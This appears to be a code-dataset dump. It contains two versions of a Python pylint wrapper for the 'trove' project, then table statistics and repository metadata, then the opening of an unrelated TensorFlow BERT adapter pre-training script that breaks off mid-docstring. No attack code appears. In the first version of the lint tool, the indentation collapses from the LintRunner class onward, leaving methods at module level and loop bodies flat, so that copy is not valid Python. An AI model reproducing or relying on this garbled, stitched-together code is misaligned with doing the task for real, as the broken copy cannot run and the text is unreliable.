    """Loadable/savable lint configuration: what to include, which pylint
    codes/messages to ignore, and which messages always count as errors."""

    def __init__(self, filename=DEFAULT_CONFIG_FILE):
        # 'filename' is accepted for interface compatibility; the initial
        # state is always the built-in defaults.  Call load() to read a file.
        self.default_config = {
            "include": ["*.py"],
            "folder": "trove",
            "options": ["--rcfile=./pylintrc", "-E"],
            "ignored_files": DEFAULT_IGNORED_FILES,
            "ignored_codes": DEFAULT_IGNORED_CODES,
            "ignored_messages": DEFAULT_IGNORED_MESSAGES,
            "ignored_file_codes": [],
            "ignored_file_messages": [],
            "ignored_file_code_messages": [],
            "always_error_messages": DEFAULT_ALWAYS_ERROR
        }
        self.config = self.default_config

    def sort_config(self):
        """Return an OrderedDict copy with keys and list values sorted,
        for stable, diff-friendly on-disk output."""
        sorted_config = OrderedDict()
        for key in sorted(self.config.keys()):
            value = self.get(key)
            if isinstance(value, list) and not isinstance(value, str):
                sorted_config[key] = sorted(value)
            else:
                sorted_config[key] = value
        return sorted_config

    def save(self, filename=DEFAULT_CONFIG_FILE):
        """Write the sorted config as JSON, keeping the old file as a
        "~" backup."""
        if os.path.isfile(filename):
            os.rename(filename, "%s~" % filename)
        with open(filename, 'w') as fp:
            # NOTE: json.dump() has no 'encoding' keyword on Python 3;
            # passing one (as the old code did) raises TypeError.
            json.dump(self.sort_config(), fp,
                      indent=2, separators=(',', ': '))

    def load(self, filename=DEFAULT_CONFIG_FILE):
        """Replace the current config with the JSON content of 'filename'."""
        with open(filename) as fp:
            # NOTE: json.load() likewise has no 'encoding' keyword on
            # Python 3.
            self.config = json.load(fp)

    def get(self, attribute):
        """Return one config value; raises KeyError for unknown keys."""
        return self.config[attribute]

    def is_file_ignored(self, f):
        """True if 'f' starts with any of the ignored path prefixes."""
        if any(f.startswith(i)
               for i in self.config['ignored_files']):
            return True
        return False

    def is_file_included(self, f):
        """True if 'f' matches one of the include glob patterns."""
        if any(fnmatch.fnmatch(f, wc) for wc in self.config['include']):
            return True
        return False

    def is_always_error(self, message):
        """True if 'message' must always be reported as an error."""
        if message in self.config['always_error_messages']:
            return True
        return False

    def ignore(self, filename, code, codename, message):
        """Decide whether a (file, code, codename, message) finding should
        be suppressed, applying the rules in priority order."""
        # the high priority checks
        if self.is_file_ignored(filename):
            return True
        # never ignore messages
        if self.is_always_error(message):
            return False
        if code in self.config['ignored_codes']:
            return True
        if codename in self.config['ignored_codes']:
            return True
        if message and any(message.startswith(ignore_message)
                           for ignore_message
                           in self.config['ignored_messages']):
            return True
        if filename and message and (
                [filename, message] in self.config['ignored_file_messages']):
            return True
        if filename and code and (
                [filename, code] in self.config['ignored_file_codes']):
            return True
        if filename and codename and (
                [filename, codename] in self.config['ignored_file_codes']):
            return True
        for fcm in self.config['ignored_file_code_messages']:
            if filename != fcm[0]:
                # This ignore rule is for a different file.
                continue
            if fcm[1] not in (code, codename):
                # This ignore rule is for a different code or codename.
                continue
            if message.startswith(fcm[2]):
                return True
        return False

    def ignore_code(self, c):
        """Globally ignore a pylint code or symbolic name."""
        _c = set(self.config['ignored_codes'])
        _c.add(c)
        self.config['ignored_codes'] = list(_c)

    def ignore_files(self, f):
        """Add a path prefix to the ignored-files list."""
        _c = set(self.config['ignored_files'])
        _c.add(f)
        self.config['ignored_files'] = list(_c)

    def ignore_message(self, m):
        """Globally ignore any message starting with 'm'."""
        _c = set(self.config['ignored_messages'])
        _c.add(m)
        self.config['ignored_messages'] = list(_c)

    # The three per-file ignore lists hold small sequences.  They are
    # normalized to *lists* so that (a) the membership tests in ignore(),
    # which compare lists, match entries added in the same session, and
    # (b) entries loaded from JSON (always lists, unhashable) can be
    # deduplicated — tuples are used only transiently for the set.

    def ignore_file_code(self, f, c):
        """Ignore code/codename 'c' in file 'f'."""
        _c = set(tuple(i) for i in self.config['ignored_file_codes'])
        _c.add((f, c))
        self.config['ignored_file_codes'] = [list(i) for i in _c]

    def ignore_file_message(self, f, m):
        """Ignore message 'm' in file 'f'."""
        _c = set(tuple(i) for i in self.config['ignored_file_messages'])
        _c.add((f, m))
        self.config['ignored_file_messages'] = [list(i) for i in _c]

    def ignore_file_code_message(self, f, c, m, fn):
        """Ignore message prefix 'm' for code 'c' in file 'f' (reported in
        function 'fn'; the function is recorded for reference only)."""
        _c = set(tuple(i) for i in self.config['ignored_file_code_messages'])
        _c.add((f, c, m, fn))
        self.config['ignored_file_code_messages'] = [list(i) for i in _c]
def main():
    """Dispatch to the requested sub-command; "check" is the default."""
    if len(sys.argv) == 1:
        return check()
    command = sys.argv[1]
    if command == "check":
        return check()
    if command == "rebuild":
        return rebuild()
    if command == "initialize":
        return initialize()
    # Unknown command: show the help text.
    return usage()
def usage():
    """Print command-line help and return a success exit code.

    The help now lists "initialize", which main() accepts but the old
    text omitted.
    """
    print("Usage: %s [check|rebuild|initialize]" % sys.argv[0])
    print("\tUse this tool to perform a lint check of the trove project.")
    print("\t check: perform the lint check.")
    print("\t rebuild: rebuild the list of exceptions to ignore.")
    print("\t initialize: initialize the list of exceptions to ignore.")
    return 0
class ParseableTextReporter(text.TextReporter):
    """A pylint text reporter emitting the old 'parseable' line layout,
    which LintRunner's 'detail' regex knows how to parse."""
    name = 'parseable'
    line_format = '{path}:{line}: [{msg_id}({symbol}), {obj}] {msg}'
    # that's it folks
class LintRunner(object):
def __init__(self):
    """Set up a runner with the built-in default Config and the regexes
    used to parse pylint's 'parseable' output."""
    self.config = Config()
    # Matches the "***** Module foo" banner lines pylint prints.
    self.idline = re.compile("^[*]* Module .*")
    # Matches one issue line: path:line: [code(symbol), obj] message
    self.detail = re.compile(r"(\S+):(\d+): \[(\S+)\((\S+)\),"
                             r" (\S+)?] (.*)")
def dolint(self, filename):
    """Run pylint on one file and return the set of findings that the
    config does not ignore, as (file, line, code, codename, func, message)
    tuples."""
    problems = set()
    output_buffer = io.StringIO()
    reporter = ParseableTextReporter(output=output_buffer)
    options = list(self.config.get('options'))
    options.append(filename)
    lint.Run(options, reporter=reporter, exit=False)
    raw_output = output_buffer.getvalue()
    output_buffer.close()
    for line in raw_output.splitlines():
        # Skip the "***** Module ..." banner lines entirely.
        if self.idline.match(line):
            continue
        mo = self.detail.match(line)
        if mo is None:
            continue
        fn, ln, code, codename, func, message = mo.groups()
        if not self.config.ignore(fn, code, codename, message):
            problems.add((fn, ln, code, codename, func, message))
    return problems
def process(self, mode=MODE_CHECK):
files_processed = 0
files_with_errors = 0
errors_recorded = 0
exceptions_recorded = 0
all_exceptions = []
for (root, dirs, files) in os.walk(self.config.get('folder')):
# if we shouldn't even bother about this part of the
# directory structure, we can punt quietly
if self.config.is_file_ignored(root):
continue
# since we are walking top down, let's clean up the dirs
# that we will walk by eliminating any dirs that will
# end up getting ignored
for d in dirs:
p = os.path.join(root, d)
if self.config.is_file_ignored(p):
dirs.remove(d)
# check if we can ignore the file and process if not
for f in files:
p = os.path.join(root, f)
if self.config.is_file_ignored(p):
continue
if not self.config.is_file_included(f):
continue
files_processed += 1
exceptions = self.dolint(p)
file_had_errors = 0
for e in exceptions:
# what we do with this exception depents on the
# kind of exception, and the mode
if self.config.is_always_error(e[5]):
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
elif mode == MODE_REBUILD:
# parameters to ignore_file_code_message are
# filename, code, message and function
self.config.ignore_file_code_message(e[0], e[2], e[-1], e[4])
self.config.ignore_file_code_message(e[0], e[3], e[-1], e[4])
exceptions_recorded += 1
elif mode == MODE_CHECK:
all_exceptions.append(e)
errors_recorded += 1
file_had_errors += 1
if file_had_errors:
files_with_errors += 1
for e in sorted(all_exceptions):
print("ERROR: %s %s: %s %s, %s: %s" %
(e[0], e[1], e[2], e[3], e[4], e[5]))
return (files_processed, files_with_errors, errors_recorded,
exceptions_recorded)
def rebuild(self):
self.initialize()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_REBUILD)
if files_with_errors > 0:
print("Rebuild failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
self.config.save()
print("Rebuild completed. %s files processed, %s exceptions recorded." %
(files_processed, exceptions_recorded))
return 0
def check(self):
self.config.load()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_CHECK)
if files_with_errors > 0:
print("Check failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
print("Check succeeded. %s files processed" % files_processed)
return 0
def initialize(self):
self.config.save()
return 0
def check():
exit(LintRunner().check())
def rebuild():
exit(LintRunner().rebuild())
def initialize():
exit(LintRunner().initialize())
if __name__ == "__main__":
main()
| 32.242165
| 85
| 0.567111
|
import fnmatch
import json
from collections import OrderedDict
import io
import os
import re
import sys
from pylint import lint
from pylint.reporters import text
# Path of the JSON file holding the lint configuration and exception list.
DEFAULT_CONFIG_FILE = "tools/trove-pylint.config"
# Path prefixes that are never linted.
DEFAULT_IGNORED_FILES = ['trove/tests']
# Codes and message prefixes ignored everywhere by default (none).
DEFAULT_IGNORED_CODES = []
DEFAULT_IGNORED_MESSAGES = []
# Messages that are always reported as errors, even if otherwise ignored.
DEFAULT_ALWAYS_ERROR = [
    "Undefined variable '_'",
    "Undefined variable '_LE'",
    "Undefined variable '_LI'",
    "Undefined variable '_LW'",
    "Undefined variable '_LC'"]

# Operating modes for LintRunner.process().
MODE_CHECK = "check"
MODE_REBUILD = "rebuild"
class Config(object):
    """In-memory lint configuration, persisted as a sorted JSON file.

    Holds the include patterns, pylint options, and the lists of
    files/codes/messages to ignore during a lint run.
    """

    def __init__(self, filename=DEFAULT_CONFIG_FILE):
        self.default_config = {
            "include": ["*.py"],
            "folder": "trove",
            "options": ["--rcfile=./pylintrc", "-E"],
            "ignored_files": DEFAULT_IGNORED_FILES,
            "ignored_codes": DEFAULT_IGNORED_CODES,
            "ignored_messages": DEFAULT_IGNORED_MESSAGES,
            "ignored_file_codes": [],
            "ignored_file_messages": [],
            "ignored_file_code_messages": [],
            "always_error_messages": DEFAULT_ALWAYS_ERROR
        }

        # ROBUSTNESS FIX: work on a copy so the ignore_* mutators cannot
        # silently rewrite the pristine defaults (every mutator replaces
        # whole list values, so a shallow copy is sufficient).
        self.config = dict(self.default_config)

    def sort_config(self):
        """Return an OrderedDict with sorted keys and sorted list values,
        giving a deterministic on-disk representation."""
        sorted_config = OrderedDict()
        for key in sorted(self.config.keys()):
            value = self.get(key)
            if isinstance(value, list) and not isinstance(value, str):
                sorted_config[key] = sorted(value)
            else:
                sorted_config[key] = value

        return sorted_config

    def save(self, filename=DEFAULT_CONFIG_FILE):
        """Write the config as JSON, keeping a ``~`` backup of any
        previous file."""
        if os.path.isfile(filename):
            os.rename(filename, "%s~" % filename)

        with open(filename, 'w') as fp:
            # BUG FIX: Python 3's json.dump() has no ``encoding`` keyword
            # (passing one raised TypeError here); the text-mode file
            # object owns the encoding instead.
            json.dump(self.sort_config(), fp,
                      indent=2, separators=(',', ': '))

    def load(self, filename=DEFAULT_CONFIG_FILE):
        """Replace the in-memory config with the file's JSON contents."""
        with open(filename) as fp:
            # BUG FIX: json.load() likewise lost the ``encoding`` keyword
            # in Python 3.
            self.config = json.load(fp)

    def get(self, attribute):
        """Return a raw configuration value; raises KeyError if absent."""
        return self.config[attribute]

    def is_file_ignored(self, f):
        """True if *f* starts with any ignored-file path prefix."""
        if any(f.startswith(i)
               for i in self.config['ignored_files']):
            return True

        return False

    def is_file_included(self, f):
        """True if filename *f* matches one of the include glob patterns."""
        if any(fnmatch.fnmatch(f, wc) for wc in self.config['include']):
            return True

        return False

    def is_always_error(self, message):
        """True if *message* must be reported even when otherwise ignored."""
        if message in self.config['always_error_messages']:
            return True

        return False

    def ignore(self, filename, code, codename, message):
        """Decide whether a pylint message should be suppressed.

        Always-error messages are never suppressed; otherwise the
        filename, code, codename and message are checked against every
        ignore list in turn.
        """
        if self.is_file_ignored(filename):
            return True

        if self.is_always_error(message):
            return False

        if code in self.config['ignored_codes']:
            return True

        if codename in self.config['ignored_codes']:
            return True

        if message and any(message.startswith(ignore_message)
                           for ignore_message
                           in self.config['ignored_messages']):
            return True

        if filename and message and (
                [filename, message] in self.config['ignored_file_messages']):
            return True

        if filename and code and (
                [filename, code] in self.config['ignored_file_codes']):
            return True

        if filename and codename and (
                [filename, codename] in self.config['ignored_file_codes']):
            return True

        for fcm in self.config['ignored_file_code_messages']:
            if filename != fcm[0]:
                # This ignore rule is for a different file.
                continue

            if fcm[1] not in (code, codename):
                # This ignore rule is for a different code or codename.
                continue

            # ROBUSTNESS FIX: guard against a None message, matching the
            # defensive ``message and`` checks above.
            if message and message.startswith(fcm[2]):
                return True

        return False

    def ignore_code(self, c):
        """Globally ignore lint code *c* (deduplicated)."""
        _c = set(self.config['ignored_codes'])
        _c.add(c)
        self.config['ignored_codes'] = list(_c)

    def ignore_files(self, f):
        """Ignore every file under path prefix *f* (deduplicated)."""
        _c = set(self.config['ignored_files'])
        _c.add(f)
        self.config['ignored_files'] = list(_c)

    def ignore_message(self, m):
        """Globally ignore messages starting with *m* (deduplicated)."""
        _c = set(self.config['ignored_messages'])
        _c.add(m)
        self.config['ignored_messages'] = list(_c)

    def ignore_file_code(self, f, c):
        """Ignore lint code *c* in file *f* (deduplicated)."""
        _c = set(self.config['ignored_file_codes'])
        _c.add((f, c))
        self.config['ignored_file_codes'] = list(_c)

    def ignore_file_message(self, f, m):
        """Ignore message *m* in file *f* (deduplicated)."""
        _c = set(self.config['ignored_file_messages'])
        _c.add((f, m))
        self.config['ignored_file_messages'] = list(_c)

    def ignore_file_code_message(self, f, c, m, fn):
        """Ignore a (file, code, message, function) combination (dedup'd)."""
        _c = set(self.config['ignored_file_code_messages'])
        _c.add((f, c, m, fn))
        self.config['ignored_file_code_messages'] = list(_c)
def main():
    """Dispatch to the requested sub-command; ``check`` is the default."""
    command = sys.argv[1] if len(sys.argv) > 1 else "check"
    handlers = {"check": check, "rebuild": rebuild, "initialize": initialize}
    return handlers.get(command, usage)()
def usage():
    """Print a short help text for the tool and return exit status 0."""
    for line in (
            "Usage: %s [check|rebuild]" % sys.argv[0],
            "\tUse this tool to perform a lint check of the trove project.",
            "\t check: perform the lint check.",
            "\t rebuild: rebuild the list of exceptions to ignore."):
        print(line)
    return 0
class ParseableTextReporter(text.TextReporter):
    # Reporter that emits one machine-parseable line per pylint message, in
    # exactly the format consumed by LintRunner's ``detail`` regex:
    #   path:line: [code(symbol), object] message
    name = 'parseable'
    line_format = '{path}:{line}: [{msg_id}({symbol}), {obj}] {msg}'
class LintRunner(object):
    """Walks the configured source tree, runs pylint on every included
    file and reports or records the resulting messages."""

    def __init__(self):
        self.config = Config()
        # Matches the "***** Module foo" banner lines in pylint output.
        self.idline = re.compile("^[*]* Module .*")
        # Parses one ParseableTextReporter line:
        #   path:line: [code(symbol), object] message
        self.detail = re.compile(r"(\S+):(\d+): \[(\S+)\((\S+)\),"
                                 r" (\S+)?] (.*)")

    def dolint(self, filename):
        """Lint *filename*; return the set of non-ignored messages as
        (file, line, code, codename, function, message) tuples."""
        exceptions = set()

        buffer = io.StringIO()
        reporter = ParseableTextReporter(output=buffer)
        options = list(self.config.get('options'))
        options.append(filename)
        lint.Run(options, reporter=reporter, exit=False)

        output = buffer.getvalue()
        buffer.close()

        for line in output.splitlines():
            if self.idline.match(line):
                continue

            if self.detail.match(line):
                mo = self.detail.search(line)
                tokens = mo.groups()
                fn = tokens[0]
                ln = tokens[1]
                code = tokens[2]
                codename = tokens[3]
                func = tokens[4]
                message = tokens[5]

                if not self.config.ignore(fn, code, codename, message):
                    exceptions.add((fn, ln, code, codename, func, message))

        return exceptions

    def process(self, mode=MODE_CHECK):
        """Lint every included file under the configured folder.

        In MODE_CHECK every non-ignored message is reported as an error;
        in MODE_REBUILD non-fatal messages are recorded as new ignore
        exceptions instead. Always-error messages are fatal in both modes.

        Returns (files_processed, files_with_errors, errors_recorded,
        exceptions_recorded).
        """
        files_processed = 0
        files_with_errors = 0
        errors_recorded = 0
        exceptions_recorded = 0
        all_exceptions = []

        for (root, dirs, files) in os.walk(self.config.get('folder')):
            # Skip ignored parts of the directory structure quietly.
            if self.config.is_file_ignored(root):
                continue

            # Since we are walking top down, prune the ignored
            # subdirectories in place so os.walk never descends into them.
            # BUG FIX: the previous code removed entries from ``dirs``
            # while iterating over it, which silently skipped the element
            # following every removed directory; rebuilding the list with
            # a slice assignment keeps the in-place semantics os.walk
            # requires for pruning and visits every entry.
            dirs[:] = [d for d in dirs
                       if not self.config.is_file_ignored(
                           os.path.join(root, d))]

            # Check if we can ignore the file and process if not.
            for f in files:
                p = os.path.join(root, f)
                if self.config.is_file_ignored(p):
                    continue

                if not self.config.is_file_included(f):
                    continue

                files_processed += 1
                exceptions = self.dolint(p)
                file_had_errors = 0

                for e in exceptions:
                    # What we do with this exception depends on the kind
                    # of exception, and the mode.
                    if self.config.is_always_error(e[5]):
                        all_exceptions.append(e)
                        errors_recorded += 1
                        file_had_errors += 1
                    elif mode == MODE_REBUILD:
                        # Parameters to ignore_file_code_message are
                        # filename, code, message and function; record the
                        # exception under both the numeric code and the
                        # symbolic codename.
                        self.config.ignore_file_code_message(
                            e[0], e[2], e[-1], e[4])
                        self.config.ignore_file_code_message(
                            e[0], e[3], e[-1], e[4])
                        exceptions_recorded += 1
                    elif mode == MODE_CHECK:
                        all_exceptions.append(e)
                        errors_recorded += 1
                        file_had_errors += 1

                if file_had_errors:
                    files_with_errors += 1

        for e in sorted(all_exceptions):
            print("ERROR: %s %s: %s %s, %s: %s" %
                  (e[0], e[1], e[2], e[3], e[4], e[5]))

        return (files_processed, files_with_errors, errors_recorded,
                exceptions_recorded)

    def rebuild(self):
        """Regenerate the exception list and save the config; 0 on success."""
        self.initialize()
        (files_processed,
         files_with_errors,
         errors_recorded,
         exceptions_recorded) = self.process(mode=MODE_REBUILD)

        if files_with_errors > 0:
            print("Rebuild failed. %s files processed, %s had errors, "
                  "%s errors recorded." % (
                      files_processed, files_with_errors, errors_recorded))
            return 1

        self.config.save()
        print("Rebuild completed. %s files processed, %s exceptions recorded." %
              (files_processed, exceptions_recorded))
        return 0

    def check(self):
        """Run the lint check against the saved config; 0 on success."""
        self.config.load()
        (files_processed,
         files_with_errors,
         errors_recorded,
         exceptions_recorded) = self.process(mode=MODE_CHECK)

        if files_with_errors > 0:
            print("Check failed. %s files processed, %s had errors, "
                  "%s errors recorded." % (
                      files_processed, files_with_errors, errors_recorded))
            return 1

        print("Check succeeded. %s files processed" % files_processed)
        return 0

    def initialize(self):
        """Write a default configuration file; always returns 0."""
        self.config.save()
        return 0
def check():
    """Console entry point: run the lint check and exit with its status."""
    runner = LintRunner()
    exit(runner.check())
def rebuild():
    """Console entry point: rebuild the exception list and exit with its status."""
    runner = LintRunner()
    exit(runner.rebuild())
def initialize():
    """Console entry point: write a default config and exit with its status."""
    runner = LintRunner()
    exit(runner.initialize())
# Allow running this module directly as a script.
if __name__ == "__main__":
    main()
| true
| true
|
f7050555bf105b4cac50608f7fef5821912f5697
| 18,791
|
py
|
Python
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 14
|
2020-06-01T14:22:43.000Z
|
2022-02-01T15:46:13.000Z
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 8
|
2020-12-17T08:23:46.000Z
|
2021-11-10T14:59:06.000Z
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 5
|
2020-06-01T14:21:17.000Z
|
2021-10-01T09:47:38.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run masked LM/next sentence masked_lm pre-training for BERT."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags

FLAGS = flags.FLAGS

## Required parameters
flags.DEFINE_string(
    "bert_config_file", None,
    "The config json file corresponding to the pre-trained BERT model. "
    "This specifies the model architecture.")

flags.DEFINE_string(
    "input_file", None,
    "Input TF example files (can be a glob or comma separated).")

flags.DEFINE_string(
    "output_dir", None,
    "The output directory where the model checkpoints will be written.")

## Other parameters
flags.DEFINE_string(
    "init_checkpoint", None,
    "Initial checkpoint (usually from a pre-trained BERT model).")

flags.DEFINE_integer(
    "max_seq_length", 128,
    "The maximum total input sequence length after WordPiece tokenization. "
    "Sequences longer than this will be truncated, and sequences shorter "
    "than this will be padded. Must match data generation.")

flags.DEFINE_integer(
    "max_predictions_per_seq", 20,
    "Maximum number of masked LM predictions per sequence. "
    "Must match data generation.")

flags.DEFINE_bool("do_train", False, "Whether to run training.")

flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")

flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")

flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")

flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")

flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")

flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")

flags.DEFINE_integer("save_checkpoints_steps", 1000,
                     "How often to save the model checkpoint.")

flags.DEFINE_integer("iterations_per_loop", 1000,
                     "How many steps to make in each estimator call.")

flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")

flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")

# TPU-only options below; they are read in main() only when --use_tpu is set.
tf.flags.DEFINE_string(
    "tpu_name", None,
    "The Cloud TPU to use for training. This should be either the name "
    "used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
    "url.")

tf.flags.DEFINE_string(
    "tpu_zone", None,
    "[Optional] GCE zone where the Cloud TPU is located in. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")

tf.flags.DEFINE_string(
    "gcp_project", None,
    "[Optional] Project name for the Cloud TPU-enabled project. If not "
    "specified, we will attempt to automatically detect the GCE project from "
    "metadata.")

tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")

flags.DEFINE_integer(
    "num_tpu_cores", 8,
    "Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
                     num_train_steps, num_warmup_steps, use_tpu,
                     use_one_hot_embeddings):
  """Returns `model_fn` closure for TPUEstimator.

  Args:
    bert_config: `modeling.BertConfig` describing the model architecture.
    init_checkpoint: optional checkpoint path to warm-start variables from.
    learning_rate: initial Adam learning rate for the optimizer.
    num_train_steps: total number of optimizer steps.
    num_warmup_steps: number of learning-rate warmup steps.
    use_tpu: whether the estimator runs on TPU.
    use_one_hot_embeddings: use one-hot matmul embedding lookup
      (TPU-friendly) instead of gather.
  """

  def model_fn(features, labels, mode, params):  # pylint: disable=unused-argument
    """The `model_fn` for TPUEstimator."""

    tf.logging.info("*** Features ***")
    for name in sorted(features.keys()):
      tf.logging.info("  name = %s, shape = %s" % (name, features[name].shape))

    input_ids = features["input_ids"]
    input_mask = features["input_mask"]
    segment_ids = features["segment_ids"]
    masked_lm_positions = features["masked_lm_positions"]
    masked_lm_ids = features["masked_lm_ids"]
    masked_lm_weights = features["masked_lm_weights"]
    next_sentence_labels = features["next_sentence_labels"]

    is_training = (mode == tf.estimator.ModeKeys.TRAIN)

    model = modeling.BertModel(
        config=bert_config,
        is_training=is_training,
        input_ids=input_ids,
        input_mask=input_mask,
        token_type_ids=segment_ids,
        use_one_hot_embeddings=use_one_hot_embeddings)

    # Pre-training loss is the sum of the masked-LM loss and the
    # next-sentence-prediction loss.
    (masked_lm_loss,
     masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
         bert_config, model.get_sequence_output(), model.get_embedding_table(),
         masked_lm_positions, masked_lm_ids, masked_lm_weights)

    (next_sentence_loss, next_sentence_example_loss,
     next_sentence_log_probs) = get_next_sentence_output(
         bert_config, model.get_pooled_output(), next_sentence_labels)

    total_loss = masked_lm_loss + next_sentence_loss

    tvars = tf.trainable_variables()

    initialized_variable_names = {}
    scaffold_fn = None
    if init_checkpoint:
      (assignment_map, initialized_variable_names
      ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
      if use_tpu:

        # On TPU the checkpoint restore is wrapped in a Scaffold factory so
        # it runs where the TPUEstimator builds the graph.
        def tpu_scaffold():
          tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
          return tf.train.Scaffold()

        scaffold_fn = tpu_scaffold
      else:
        tf.train.init_from_checkpoint(init_checkpoint, assignment_map)

    tf.logging.info("**** Trainable Variables ****")
    for var in tvars:
      init_string = ""
      if var.name in initialized_variable_names:
        init_string = ", *INIT_FROM_CKPT*"
      tf.logging.info("  name = %s, shape = %s%s", var.name, var.shape,
                      init_string)

    output_spec = None
    if mode == tf.estimator.ModeKeys.TRAIN:
      train_op = optimization.create_optimizer(
          total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)

      output_spec = tf.contrib.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=total_loss,
          train_op=train_op,
          scaffold_fn=scaffold_fn)
    elif mode == tf.estimator.ModeKeys.EVAL:

      def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
                    masked_lm_weights, next_sentence_example_loss,
                    next_sentence_log_probs, next_sentence_labels):
        """Computes the loss and accuracy of the model."""
        masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
                                         [-1, masked_lm_log_probs.shape[-1]])
        masked_lm_predictions = tf.argmax(
            masked_lm_log_probs, axis=-1, output_type=tf.int32)
        masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
        masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
        masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
        # Weighting by masked_lm_weights keeps zero-padded prediction slots
        # from contributing to accuracy or mean loss.
        masked_lm_accuracy = tf.metrics.accuracy(
            labels=masked_lm_ids,
            predictions=masked_lm_predictions,
            weights=masked_lm_weights)
        masked_lm_mean_loss = tf.metrics.mean(
            values=masked_lm_example_loss, weights=masked_lm_weights)

        next_sentence_log_probs = tf.reshape(
            next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
        next_sentence_predictions = tf.argmax(
            next_sentence_log_probs, axis=-1, output_type=tf.int32)
        next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
        next_sentence_accuracy = tf.metrics.accuracy(
            labels=next_sentence_labels, predictions=next_sentence_predictions)
        next_sentence_mean_loss = tf.metrics.mean(
            values=next_sentence_example_loss)

        return {
            "masked_lm_accuracy": masked_lm_accuracy,
            "masked_lm_loss": masked_lm_mean_loss,
            "next_sentence_accuracy": next_sentence_accuracy,
            "next_sentence_loss": next_sentence_mean_loss,
        }

      eval_metrics = (metric_fn, [
          masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
          masked_lm_weights, next_sentence_example_loss,
          next_sentence_log_probs, next_sentence_labels
      ])
      output_spec = tf.contrib.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=total_loss,
          eval_metrics=eval_metrics,
          scaffold_fn=scaffold_fn)
    else:
      raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))

    return output_spec

  return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
                         label_ids, label_weights):
  """Get loss and log probs for the masked LM.

  `input_tensor` is the sequence output of BertModel and `output_weights`
  is the embedding table, reused here as the softmax weight matrix
  (weight tying).
  """
  # Keep only the vectors at the masked positions.
  input_tensor = gather_indexes(input_tensor, positions)

  with tf.variable_scope("cls/predictions"):
    # We apply one more non-linear transformation before the output layer.
    # This matrix is not used after pre-training.
    with tf.variable_scope("transform"):
      input_tensor = tf.layers.dense(
          input_tensor,
          units=bert_config.hidden_size,
          activation=modeling.get_activation(bert_config.hidden_act),
          kernel_initializer=modeling.create_initializer(
              bert_config.initializer_range))
      input_tensor = modeling.layer_norm(input_tensor)

    # The output weights are the same as the input embeddings, but there is
    # an output-only bias for each token.
    output_bias = tf.get_variable(
        "output_bias",
        shape=[bert_config.vocab_size],
        initializer=tf.zeros_initializer())
    logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
    logits = tf.nn.bias_add(logits, output_bias)
    log_probs = tf.nn.log_softmax(logits, axis=-1)

    label_ids = tf.reshape(label_ids, [-1])
    label_weights = tf.reshape(label_weights, [-1])

    one_hot_labels = tf.one_hot(
        label_ids, depth=bert_config.vocab_size, dtype=tf.float32)

    # The `positions` tensor might be zero-padded (if the sequence is too
    # short to have the maximum number of predictions). The `label_weights`
    # tensor has a value of 1.0 for every real prediction and 0.0 for the
    # padding predictions.
    per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
    numerator = tf.reduce_sum(label_weights * per_example_loss)
    # The small epsilon keeps the division defined when every slot is padding.
    denominator = tf.reduce_sum(label_weights) + 1e-5
    loss = numerator / denominator

  return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
  """Get loss and log probs for the next sentence prediction.

  `input_tensor` is the pooled output of BertModel (see the caller in
